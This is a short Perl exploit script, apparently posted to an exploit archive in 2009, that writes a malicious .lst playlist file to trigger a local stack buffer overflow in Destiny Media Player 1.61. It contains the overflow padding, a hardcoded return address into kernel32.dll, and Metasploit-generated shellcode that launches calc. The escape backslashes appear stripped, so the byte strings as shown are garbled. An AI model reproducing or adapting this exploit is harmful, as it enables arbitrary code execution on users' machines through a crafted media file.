dmp161lst3-overflow.txt
Posted on 06 January 2009
#!/usr/bin/perl -w # exploit coded by Houssamix # poc found by aBo MoHaMeD print "===================================================================== "; print "Author : Houssamix "; print "===================================================================== "; print "Destiny Media Player 1.61 (.lst File) Local Stack Overflow Exploit "; print "===================================================================== "; my $overflow = "x41" x 2052; my $ret = "x5Dx38x82x7C"; #call ESP from kernel32.dll 0x7C82385D my $nop = "x90" x 1; # win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com my $shellcode = "x31xc9x83xe9xdexd9xeexd9x74x24xf4x5bx81x73x13x08". "x99x23x82x83xebxfcxe2xf4xf4x71x67x82x08x99xa8xc7". "x34x12x5fx87x70x98xccx09x47x81xa8xddx28x98xc8xcb". "x83xadxa8x83xe6xa8xe3x1bxa4x1dxe3xf6x0fx58xe9x8f". "x09x5bxc8x76x33xcdx07x86x7dx7cxa8xddx2cx98xc8xe4". "x83x95x68x09x57x85x22x69x83x85xa8x83xe3x10x7fxa6". "x0cx5ax12x42x6cx12x63xb2x8dx59x5bx8ex83xd9x2fx09". "x78x85x8ex09x60x91xc8x8bx83x19x93x82x08x99xa8xea". "x34xc6x12x74x68xcfxaax7ax8bx59x58xd2x60x69xa9x86". "x57xf1xbbx7cx82x97x74x7dxefxfax42xeex6bx99x23x82"; my $file="hsmx.lst"; $exploit = $overflow.$ret.$nop.$shellcode; open(my $FILE, ">>$file") or die "Cannot open $file: $!"; print $FILE $exploit ; close($FILE); print "$file has been created ";
